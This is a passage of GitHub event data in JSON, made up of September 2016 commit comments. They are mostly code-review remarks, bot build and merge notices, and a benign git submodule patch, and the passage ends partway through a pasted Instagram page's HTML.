{"id":"4571052251","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19045463,"position":null,"line":null,"path":null,"commit_id":"0dac9af20af117b88d31addc4f1eec77f22f7498","created_at":"2016-09-15T22:07:36Z","updated_at":"2016-09-15T22:07:36Z","body":"@Sami32 That the libraries have the same names doesn't mean they are the same. Look at the Javadocs ([Apache](https://commons.apache.org/proper/commons-lang/javadocs/api-2.6/org/apache/commons/lang/StringUtils.html), [Plexus](https://codehaus-plexus.github.io/plexus-utils/apidocs/org/codehaus/plexus/util/StringUtils.html)) and you will see that they contain very different methods. That said, I think the threshold for using a new library is very low in this project, and that there's probably quite a few libs included where only tiny parts are used. Both size and \"upstream bugs\" could probably have been reduced quite a lot with a different strategy."}},"created_at":"2016-09-15T22:07:36Z"}
{"id":"4571055059","type":"CommitCommentEvent","actor":{"login":"Zauberstuhl"},"repo":{"name":"Zauberstuhl/diaspora"},"payload":{"comment":{"id":19045474,"position":8,"line":44,"path":"app/assets/javascripts/jsxc.js","commit_id":"5bf96b69d8f7c43a55e10b274ea4f1288390e82f","created_at":"2016-09-15T22:08:14Z","updated_at":"2016-09-15T22:08:14Z","body":"should be `jsxc.xmpp.login()` since presence shouldn't be touched see https://github.com/diaspora/jsxc/issues/130#issuecomment-247452298"}},"created_at":"2016-09-15T22:08:14Z"}
{"id":"4571059921","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045485,"position":26,"line":26,"path":"server/app/routes/friends.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:09:18Z","updated_at":"2016-09-15T22:09:18Z","body":"I wouldn't do a `res.redirect` here — you're breaking the SPA by forcing a page reload, I think. Instead I'd just send back the created friend, and in your Angular app do a `$state.go` to a parameterized state."}},"created_at":"2016-09-15T22:09:18Z"}
{"id":"4571061549","type":"CommitCommentEvent","actor":{"login":"revett"},"repo":{"name":"vidsy/static-assets"},"payload":{"comment":{"id":19045488,"position":null,"line":null,"path":null,"commit_id":"788b0b04e869166759c5ce2c9b57fde6f44e160d","created_at":"2016-09-15T22:09:41Z","updated_at":"2016-09-15T22:09:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;11tmv855&#x2F;501-br-only-show-creators-tab-for-admins-when-viewing-insights\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [BR] Only show &quot;Creators&quot; tab for admins when viewing insights</a>"}},"created_at":"2016-09-15T22:09:41Z"}
{"id":"4571062647","type":"CommitCommentEvent","actor":{"login":"Paebbels"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045493,"position":null,"line":null,"path":null,"commit_id":"bc9adb048fbf9ecca17cb01d0a34188d3893d58a","created_at":"2016-09-15T22:09:56Z","updated_at":"2016-09-15T22:09:56Z","body":"We are currently using tabs of size 2. Each file contains a 3 line header, which is parsed by most editors."}},"created_at":"2016-09-15T22:09:56Z"}
{"id":"4571063569","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19045496,"position":null,"line":null,"path":null,"commit_id":"091f7fcdf0d3cae8569b414d7722966b44c316b1","created_at":"2016-09-15T22:10:09Z","updated_at":"2016-09-15T22:10:09Z","body":"fast-forwarding master to auto = 8a39e3f7"}},"created_at":"2016-09-15T22:10:09Z"}
{"id":"4571065357","type":"CommitCommentEvent","actor":{"login":"Paebbels"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045504,"position":25,"line":51,"path":"tb/vunit/math_tb.vhdl","commit_id":"bc9adb048fbf9ecca17cb01d0a34188d3893d58a","created_at":"2016-09-15T22:10:30Z","updated_at":"2016-09-15T22:10:30Z","body":"Oh, I need to convert the `=`-sign to a comma ..."}},"created_at":"2016-09-15T22:10:30Z"}
{"id":"4571066025","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045510,"position":47,"line":47,"path":"server/app/routes/friends.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:10:38Z","updated_at":"2016-09-15T22:10:38Z","body":"`return` this nested promise chain, else you can have silent errors!"}},"created_at":"2016-09-15T22:10:38Z"}
{"id":"4571066400","type":"CommitCommentEvent","actor":{"login":"franbenz"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19045511,"position":6,"line":24,"path":"brunch-config.js","commit_id":"fc040a22d5d9330437999eea55c4e34188072610","created_at":"2016-09-15T22:10:43Z","updated_at":"2016-09-15T22:10:43Z","body":"Hi @soumak77 Why is the linter applied just to only one file?"}},"created_at":"2016-09-15T22:10:43Z"}
{"id":"4571069844","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045521,"position":44,"line":44,"path":"server/app/routes/friends.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:11:26Z","updated_at":"2016-09-15T22:11:26Z","body":"It's possible to do this using `Friend.update` but there are a few caveats — check out the solution to the Express review week checkpoint."}},"created_at":"2016-09-15T22:11:26Z"}
{"id":"4571070442","type":"CommitCommentEvent","actor":{"login":"ImagicalGamer"},"repo":{"name":"ImagicalGamer/SurvivalGames"},"payload":{"comment":{"id":19045522,"position":null,"line":null,"path":null,"commit_id":"6e129e7a5569ae8d4d65c987c142531a5f56be70","created_at":"2016-09-15T22:11:34Z","updated_at":"2016-09-15T22:11:34Z","body":"Sure"}},"created_at":"2016-09-15T22:11:34Z"}
{"id":"4571071065","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045524,"position":68,"line":68,"path":"server/app/routes/friends.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:11:42Z","updated_at":"2016-09-15T22:11:42Z","body":"LOL"}},"created_at":"2016-09-15T22:11:42Z"}
{"id":"4571072201","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.registry"},"payload":{"comment":{"id":19045525,"position":null,"line":null,"path":null,"commit_id":"8217b26b44e8ae54218602d27c4b806fad809cc0","created_at":"2016-09-15T22:11:58Z","updated_at":"2016-09-15T22:11:58Z","body":"nathan.vangheem your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-15T22:11:58Z"}
{"id":"4571072742","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19045526,"position":42,"line":36,"path":"app/Migrations/Schema/V111/Version20160907140300.php","commit_id":"3f8f859f71ea836449d4e225495d016f283d2634","created_at":"2016-09-15T22:12:06Z","updated_at":"2016-09-15T22:12:06Z","body":"`request_date` is  NOT null"}},"created_at":"2016-09-15T22:12:06Z"}
{"id":"4571073263","type":"CommitCommentEvent","actor":{"login":"anandmohancs"},"repo":{"name":"Bazze/prestashop-orderemails"},"payload":{"comment":{"id":19045527,"position":null,"line":null,"path":null,"commit_id":"32aa0d5f9e087821bd58a62f83e4ed9d1df352f9","created_at":"2016-09-15T22:12:12Z","updated_at":"2016-09-15T22:12:12Z","body":"Hi Bazze thanks a lot to sharing this module.\r\nI installed it in prestashop 1.6.1.6 their is no problem with installation and configuration  but at the time of payment its showing error that unable to handle the page and i am not getting any  mail.\r\nCould you please help me because i am unaware of Prestashop module structure.\r\nPlease help me...it would be a great help if you can help me to modify it.\r\nThanks."}},"created_at":"2016-09-15T22:12:12Z"}
{"id":"4571074053","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045529,"position":75,"line":75,"path":"server/app/routes/friends.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:12:24Z","updated_at":"2016-09-15T22:12:24Z","body":"Is this a custom instance method? Cool if so!"}},"created_at":"2016-09-15T22:12:24Z"}
{"id":"4571076142","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045533,"position":75,"line":75,"path":"server/app/routes/friends.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:12:51Z","updated_at":"2016-09-15T22:12:51Z","body":"Also though, Sequelize may already have this for you as `getFriend` depending on how you do your associations."}},"created_at":"2016-09-15T22:12:51Z"}
{"id":"4571079244","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19045538,"position":null,"line":null,"path":null,"commit_id":"abdc0f34c6f07baf4c8d2952861747ae82e1fefa","created_at":"2016-09-15T22:13:32Z","updated_at":"2016-09-15T22:13:32Z","body":"fixes #2"}},"created_at":"2016-09-15T22:13:32Z"}
{"id":"4571080065","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19045540,"position":203,"line":197,"path":"app/Migrations/Schema/V111/Version20160907140300.php","commit_id":"3f8f859f71ea836449d4e225495d016f283d2634","created_at":"2016-09-15T22:13:44Z","updated_at":"2016-09-15T22:13:44Z","body":"There is fields defined like NOT null"}},"created_at":"2016-09-15T22:13:44Z"}
{"id":"4571084311","type":"CommitCommentEvent","actor":{"login":"andcastillo"},"repo":{"name":"cheminfo/nmr-metadata"},"payload":{"comment":{"id":19045556,"position":null,"line":null,"path":null,"commit_id":"655fb0f1f055193a8107cbdb672d5ebdc1e0a73c","created_at":"2016-09-15T22:14:40Z","updated_at":"2016-09-15T22:14:40Z","body":"Sorry @targos, I wanted to make a pull request but I did a commit in master. This solves my request in https://github.com/cheminfo/eln-plugin/issues/2"}},"created_at":"2016-09-15T22:14:40Z"}
{"id":"4571086847","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19045563,"position":null,"line":null,"path":null,"commit_id":"3901b072d07804c76f2947da1c08b20439b79ac1","created_at":"2016-09-15T22:15:16Z","updated_at":"2016-09-15T22:15:16Z","body":"FixTransitionRules (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2330 of 2330 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T22:15:16Z"}
{"id":"4571090281","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045572,"position":21,"line":21,"path":"server/app/utils/HttpError.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:16:05Z","updated_at":"2016-09-15T22:16:05Z","body":"You included this, but didn't use in your routes?"}},"created_at":"2016-09-15T22:16:05Z"}
{"id":"4571090601","type":"CommitCommentEvent","actor":{"login":"raetzman"},"repo":{"name":"raetzman/Wolfsrudel"},"payload":{"comment":{"id":19045573,"position":null,"line":null,"path":null,"commit_id":"92d06dfe09e5b606abc3069663baae8142a8f1fd","created_at":"2016-09-15T22:16:09Z","updated_at":"2016-09-15T22:16:09Z","body":"Hallo"}},"created_at":"2016-09-15T22:16:09Z"}
{"id":"4571091032","type":"CommitCommentEvent","actor":{"login":"soumak77"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19045576,"position":6,"line":24,"path":"brunch-config.js","commit_id":"fc040a22d5d9330437999eea55c4e34188072610","created_at":"2016-09-15T22:16:14Z","updated_at":"2016-09-15T22:16:14Z","body":"@franbenz the `config-routes.js` file is auto-generated as part of the build and does not comply with the linter settings for the template therefore causing the build to fail.  I added this config to report those errors as warnings just for this one file.  Any other linter errors in other files will still fail the build."}},"created_at":"2016-09-15T22:16:14Z"}
{"id":"4571092057","type":"CommitCommentEvent","actor":{"login":"raphaelsander"},"repo":{"name":"raphaelsander/AppInstall"},"payload":{"comment":{"id":19045578,"position":null,"line":null,"path":null,"commit_id":"c5d1895935a5feaa2424fbcbeae3f49de70deab8","created_at":"2016-09-15T22:16:27Z","updated_at":"2016-09-15T22:16:27Z","body":"*Correção nas funções back e next."}},"created_at":"2016-09-15T22:16:27Z"}
{"id":"4571094289","type":"CommitCommentEvent","actor":{"login":"tamarrow"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045583,"position":35,"line":100,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:16:59Z","updated_at":"2016-09-15T22:16:59Z","body":"we can remove this- thats true of most of the tests "}},"created_at":"2016-09-15T22:16:59Z"}
{"id":"4571094306","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19045584,"position":null,"line":null,"path":null,"commit_id":"abdc0f34c6f07baf4c8d2952861747ae82e1fefa","created_at":"2016-09-15T22:16:59Z","updated_at":"2016-09-15T22:16:59Z","body":"fixes #1"}},"created_at":"2016-09-15T22:16:59Z"}
{"id":"4571096771","type":"CommitCommentEvent","actor":{"login":"MCShovel"},"repo":{"name":"MCShovel/GriefPrevention"},"payload":{"comment":{"id":19045594,"position":26,"line":448,"path":"src/me/ryanhamshire/GriefPrevention/BlockEventHandler.java","commit_id":"800f0d76d8b786bb1491c139885a71aaf82a8ac1","created_at":"2016-09-15T22:17:33Z","updated_at":"2016-09-15T22:17:33Z","body":"Oh, sorry. This is true in very special cases. Our server employs pistons on Movecraft ships, thus a piston being in a claim is meaningless. \r\n\r\nJust ignore this fork for for your own sanity ;)"}},"created_at":"2016-09-15T22:17:33Z"}
{"id":"4571098254","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045597,"position":62,"line":62,"path":"server/app/configure/authentication/local.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:17:54Z","updated_at":"2016-09-15T22:17:54Z","body":"If you omit the `password`, this lets somebody sign in."}},"created_at":"2016-09-15T22:17:54Z"}
{"id":"4571101533","type":"CommitCommentEvent","actor":{"login":"dozylynx"},"repo":{"name":"eric-ch/openxt"},"payload":{"comment":{"id":19045603,"position":null,"line":null,"path":null,"commit_id":"2f13d7e19d1de258a01ac57f3484f7a05c6e5461","created_at":"2016-09-15T22:18:40Z","updated_at":"2016-09-15T22:18:40Z","body":"I tested this in a roundabout way, by patching my local build oe/build.sh, just after openxt.git gets cloned, with the below patch to apply this PR.\r\n\r\nWith that in place, the build does clone the meta-intel repo into the right directory, and checkout the specified commit, so I'd call that a success.\r\nThe build then proceeds into the usual bitbake recipe processing as expected.\r\n\r\n```\r\n    # just after the clone...\r\ncat >../meta-intel.patch <<EOF\r\nFrom 569cc1a06ac40a9701cc1c0db20afdf3ad757a61 Mon Sep 17 00:00:00 2001\r\nFrom: bob <foo@bar>\r\nDate: Thu, 15 Sep 2016 14:44:14 -0700\r\nSubject: [PATCH] add meta-intel submodule\r\n\r\n---\r\n .gitmodules            | 4 ++++\r\n build/repos/meta-intel | 1 +\r\n 2 files changed, 5 insertions(+)\r\n create mode 160000 build/repos/meta-intel\r\n\r\ndiff --git a/.gitmodules b/.gitmodules\r\nindex 302da4d..af10633 100644\r\n--- a/.gitmodules\r\n+++ b/.gitmodules\r\n@@ -18,3 +18,7 @@\r\n        path = build/repos/meta-selinux\r\n        url = git://git.yoctoproject.org/meta-selinux\r\n        branch = jethro\r\n+[submodule \"build/repos/meta-intel\"]\r\n+       path = build/repos/meta-intel\r\n+       url = git://git.yoctoproject.org/meta-intel\r\n+       branch = jethro\r\ndiff --git a/build/repos/meta-intel b/build/repos/meta-intel\r\nnew file mode 160000\r\nindex 0000000..aca8652\r\n--- /dev/null\r\n+++ b/build/repos/meta-intel\r\n@@ -0,0 +1 @@\r\n+Subproject commit aca8652267fb70a00995d32a1de8581694d6c867\r\n--\r\n2.1.4\r\n\r\nEOF\r\n    git config user.email build@build\r\n    git config user.name build\r\n    git am --ignore-whitespace ../meta-intel.patch\r\n```\r\n"}},"created_at":"2016-09-15T22:18:40Z"}
{"id":"4571102496","type":"CommitCommentEvent","actor":{"login":"aaasen"},"repo":{"name":"socrata/opendatanetwork.com"},"payload":{"comment":{"id":19045606,"position":null,"line":null,"path":null,"commit_id":"639fbf741d02b5cebd800306cc9600e3a110f050","created_at":"2016-09-15T22:18:53Z","updated_at":"2016-09-15T22:18:53Z","body":"This will make make the client call the backend to get new chart values every time the page is resized. It would be better to save the data table associated with the chart and only redraw the chart when the page is resized instead of downloading new data and creating a new data table."}},"created_at":"2016-09-15T22:18:53Z"}
{"id":"4571103399","type":"CommitCommentEvent","actor":{"login":"Minatour"},"repo":{"name":"Minatour/Minatour-First-Code"},"payload":{"comment":{"id":19045609,"position":null,"line":null,"path":null,"commit_id":"4922c409596ff0ad30413a0aa79b8dbacc1e36c9","created_at":"2016-09-15T22:19:06Z","updated_at":"2016-09-15T22:19:06Z","body":"This is my initial comment on a branch"}},"created_at":"2016-09-15T22:19:06Z"}
{"id":"4571104120","type":"CommitCommentEvent","actor":{"login":"andyjansson"},"repo":{"name":"crazile/postcss-functions"},"payload":{"comment":{"id":19045611,"position":10,"line":13,"path":"index.js","commit_id":"5d876cc997b67e0346fd11e7045031182cbc27b6","created_at":"2016-09-15T22:19:16Z","updated_at":"2016-09-15T22:19:16Z","body":"Promises got added to node in v0.12 IIRC. v0.10 LTS support is ending in two weeks (followed by v0.12 two months after), so I think it's safe to assume that promises are available. Don't you think? "}},"created_at":"2016-09-15T22:19:16Z"}
{"id":"4571104511","type":"CommitCommentEvent","actor":{"login":"biesbjerg"},"repo":{"name":"driftyco/ionic-cli"},"payload":{"comment":{"id":19045612,"position":6,"line":47,"path":"lib/ionic/add.js","commit_id":"fac1c4d7b49e7c102269f3d5e0acef660d762bf5","created_at":"2016-09-15T22:19:22Z","updated_at":"2016-09-15T22:19:22Z","body":"\"Deprecated\" was correct ;-)"}},"created_at":"2016-09-15T22:19:22Z"}
{"id":"4571107617","type":"CommitCommentEvent","actor":{"login":"bdmogal"},"repo":{"name":"caskdata/cdap"},"payload":{"comment":{"id":19045615,"position":75,"line":536,"path":"cdap-data-fabric/src/main/java/co/cask/cdap/data2/transaction/stream/FileStreamAdmin.java","commit_id":"248657771cd7e9e3eb9cd9991b9b0e7e05cb2f25","created_at":"2016-09-15T22:20:09Z","updated_at":"2016-09-15T22:20:09Z","body":"stream.toId"}},"created_at":"2016-09-15T22:20:09Z"}
{"id":"4571111463","type":"CommitCommentEvent","actor":{"login":"bdmogal"},"repo":{"name":"caskdata/cdap"},"payload":{"comment":{"id":19045622,"position":16,"line":51,"path":"cdap-data-fabric/src/test/java/co/cask/cdap/data2/datafabric/dataset/service/DatasetInstanceServiceTest.java","commit_id":"248657771cd7e9e3eb9cd9991b9b0e7e05cb2f25","created_at":"2016-09-15T22:21:03Z","updated_at":"2016-09-15T22:21:03Z","body":"NamespaceId.DEFAULT.flow(...)"}},"created_at":"2016-09-15T22:21:03Z"}
{"id":"4571111861","type":"CommitCommentEvent","actor":{"login":"bdmogal"},"repo":{"name":"caskdata/cdap"},"payload":{"comment":{"id":19045623,"position":21,"line":55,"path":"cdap-data-fabric/src/test/java/co/cask/cdap/data2/datafabric/dataset/service/DatasetInstanceServiceTest.java","commit_id":"248657771cd7e9e3eb9cd9991b9b0e7e05cb2f25","created_at":"2016-09-15T22:21:09Z","updated_at":"2016-09-15T22:21:09Z","body":"ditto"}},"created_at":"2016-09-15T22:21:09Z"}
{"id":"4571113107","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19045627,"position":null,"line":null,"path":null,"commit_id":"bc9adb048fbf9ecca17cb01d0a34188d3893d58a","created_at":"2016-09-15T22:21:25Z","updated_at":"2016-09-15T22:21:25Z","body":"Most editors? I see lines for exactly 3 editors. My editor (sublime text) doesn't interpret it, also Github's one doesn't care about it. Space characters would be understand by all editors."}},"created_at":"2016-09-15T22:21:25Z"}
{"id":"4571121404","type":"CommitCommentEvent","actor":{"login":"tamarrow"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045648,"position":38,"line":102,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:23:21Z","updated_at":"2016-09-15T22:23:21Z","body":"lets call this actual_json to be consistent with 'expected_json`"}},"created_at":"2016-09-15T22:23:21Z"}
{"id":"4571127119","type":"CommitCommentEvent","actor":{"login":"cruhland"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045659,"position":38,"line":102,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:24:44Z","updated_at":"2016-09-15T22:24:44Z","body":"Which one? `pods_by_id` or `parsed_stdout`?"}},"created_at":"2016-09-15T22:24:44Z"}
{"id":"4571128259","type":"CommitCommentEvent","actor":{"login":"btiernay"},"repo":{"name":"icgc-dcc/dcc-portal"},"payload":{"comment":{"id":19045661,"position":5,"line":498,"path":"dcc-portal-ui/app/scripts/projects/js/projects.js","commit_id":"95cd822c363413b57c1288f9fe48f0043ea12e42","created_at":"2016-09-15T22:24:59Z","updated_at":"2016-09-15T22:24:59Z","body":"Use \"size\" for increased awesomeness / DRYness?"}},"created_at":"2016-09-15T22:24:59Z"}
{"id":"4571128462","type":"CommitCommentEvent","actor":{"login":"cruhland"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045662,"position":38,"line":102,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:25:02Z","updated_at":"2016-09-15T22:25:02Z","body":"`parsed_stdout` matches the structure of `expected_json`"}},"created_at":"2016-09-15T22:25:02Z"}
{"id":"4571128972","type":"CommitCommentEvent","actor":{"login":"tamarrow"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045663,"position":40,"line":104,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:25:10Z","updated_at":"2016-09-15T22:25:10Z","body":"can we move this into a helper method and remove the side effects? "}},"created_at":"2016-09-15T22:25:10Z"}
{"id":"4571129229","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19045665,"position":null,"line":null,"path":null,"commit_id":"a0c7fb5f7aa1c7d9028f61fac2129344a2d51734","created_at":"2016-09-15T22:25:13Z","updated_at":"2016-09-15T22:25:13Z","body":"saw approval from javajolt\nat https://github.com/basho/riak_core/commit/a0c7fb5f7aa1c7d9028f61fac2129344a2d51734"}},"created_at":"2016-09-15T22:25:13Z"}
{"id":"4571129267","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19045666,"position":null,"line":null,"path":null,"commit_id":"a0c7fb5f7aa1c7d9028f61fac2129344a2d51734","created_at":"2016-09-15T22:25:13Z","updated_at":"2016-09-15T22:25:13Z","body":"merging basho/riak_core/fd-elevedb-bump = a0c7fb5f into borshop-integration-859-fd-elevedb-bump"}},"created_at":"2016-09-15T22:25:13Z"}
{"id":"4571129287","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19045667,"position":null,"line":null,"path":null,"commit_id":"a0c7fb5f7aa1c7d9028f61fac2129344a2d51734","created_at":"2016-09-15T22:25:13Z","updated_at":"2016-09-15T22:25:13Z","body":"basho/riak_core/fd-elevedb-bump = a0c7fb5f merged ok, testing candidate = 1db95400"}},"created_at":"2016-09-15T22:25:13Z"}
{"id":"4571129430","type":"CommitCommentEvent","actor":{"login":"cdbfoster"},"repo":{"name":"serprex/zero_sum"},"payload":{"comment":{"id":19045668,"position":null,"line":null,"path":null,"commit_id":"d0b2fd302e95d66a8c5e1b29cef3d48dc25695a8","created_at":"2016-09-15T22:25:16Z","updated_at":"2016-09-15T22:25:16Z","body":"Replacing the use of the `time` crate with the standard library is definitely superior, thanks.  However, in `ply_generator.rs`, I avoided `thread_rng` because I planned eventually to allow seeding by the user."}},"created_at":"2016-09-15T22:25:16Z"}
{"id":"4571131230","type":"CommitCommentEvent","actor":{"login":"taschini"},"repo":{"name":"morepath/reg"},"payload":{"comment":{"id":19045674,"position":null,"line":null,"path":null,"commit_id":"6141018729be5139e94b3b4881d2b3309109f69e","created_at":"2016-09-15T22:25:43Z","updated_at":"2016-09-15T22:25:43Z","body":"Now you have:\r\n\r\n```python\r\n>>> from reg.tests.fixtures.module import foo\r\n>>> import pdb\r\n>>> pdb.runcall(foo, 'something')\r\n> <generated code: def call(obj):\r\n    _key = _registry_key(obj=obj)\r\n    return (_component_lookup(_key) or\r\n            _fallback_lookup(_key) or\r\n            _fallback)(obj)\r\n>(2)call()\r\n```"}},"created_at":"2016-09-15T22:25:43Z"}
{"id":"4571131251","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045675,"position":12,"line":12,"path":"server/app/routes/cart.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:25:43Z","updated_at":"2016-09-15T22:25:43Z","body":"Eric sez: carts === orders?"}},"created_at":"2016-09-15T22:25:43Z"}
{"id":"4571132671","type":"CommitCommentEvent","actor":{"login":"ThomasD97"},"repo":{"name":"ThomasD97/Cruel"},"payload":{"comment":{"id":19045678,"position":null,"line":null,"path":null,"commit_id":"190491e11547d9971dec1f4ecfded14e1615a165","created_at":"2016-09-15T22:26:02Z","updated_at":"2016-09-15T22:26:02Z","body":"<!DOCTYPE html>\r\n<!--[if lt IE 7]> <html lang=\"en\" class=\"no-js lt-ie9 lt-ie8 lt-ie7 logged-in \"> <![endif]-->\r\n<!--[if IE 7]> <html lang=\"en\" class=\"no-js lt-ie9 lt-ie8 logged-in \"> <![endif]-->\r\n<!--[if IE 8]> <html lang=\"en\" class=\"no-js lt-ie9 logged-in \"> <![endif]-->\r\n<!--[if gt IE 8]><!--> <html lang=\"en\" class=\"no-js logged-in \"> <!--<![endif]-->\r\n<head>\r\n<script type=\"text/javascript\">window._timings = {\"domLoading\": Date.now()}</script>\r\n\r\n<meta charset=\"utf-8\">\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n\r\n<title>\r\n@cruelfilms • Instagram photos and videos\r\n</title>\r\n\r\n<script type=\"text/javascript\">\r\nWebFontConfig = {\r\ncustom: {\r\nfamilies: ['proxima-nova:n3,n4,n6,n7'],\r\n}\r\n};\r\n</script>\r\n<script src=\"//instagramstatic-a.akamaihd.net/h1/scripts/webfont.js/c0456c81549b.js\" type=\"text/javascript\" async></script>\r\n\r\n<style type=\"text/css\">\r\n/* @license\r\n* MyFonts Webfont Build ID 2164953, 2012-03-23T23:06:30-0400\r\n*\r\n* The fonts listed in this notice are subject to the End User License\r\n* Agreement(s) entered into by the website owner. All other parties are\r\n* explicitly restricted from using the Licensed Webfonts(s).\r\n*\r\n* You may obtain a valid license at the URLs below.\r\n*\r\n*\r\n* Webfont: Proxima Nova Light by Mark Simonson\r\n* URL: http://www.myfonts.com/fonts/marksimonson/proxima-nova/light/\r\n* Licensed pageviews: unlimited\r\n*\r\n* Webfont: Proxima Nova Regular by Mark Simonson\r\n* URL: http://www.myfonts.com/fonts/marksimonson/proxima-nova/regular/\r\n* Licensed pageviews: unlimited\r\n*\r\n* Webfont: Proxima Nova Semibold by Mark Simonson\r\n* URL: http://www.myfonts.com/fonts/marksimonson/proxima-nova/semibold/\r\n* Licensed pageviews: unlimited\r\n*\r\n* Webfont: Proxima Nova Bold Italic by Mark Simonson\r\n* URL: http://www.myfonts.com/fonts/marksimonson/proxima-nova/bold-it/\r\n* Licensed pageviews: unlimited\r\n*\r\n* Webfont: Proxima Nova Bold by Mark Simonson\r\n* URL: http://www.myfonts.com/fonts/marksimonson/proxima-nova/bold/\r\n* Licensed pageviews: unlimited\r\n*\r\n* Webfont: Proxima Nova Italic by Mark Simonson\r\n* URL: http://www.myfonts.com/fonts/marksimonson/proxima-nova/regular-it/\r\n* Licensed pageviews: unlimited\r\n*\r\n*\r\n* License: http://www.myfonts.com/viewlicense?type=web&buildid=2164953\r\n* Webfonts copyright: Copyright (c) Mark Simonson, 2005. All rights reserved.\r\n*\r\n* (c) 2012 Bitstream Inc\r\n*/\r\n@font-face {\r\nfont-family: 'proxima-nova';\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.eot/115b1f7f9c04.eot');\r\nsrc: url(' 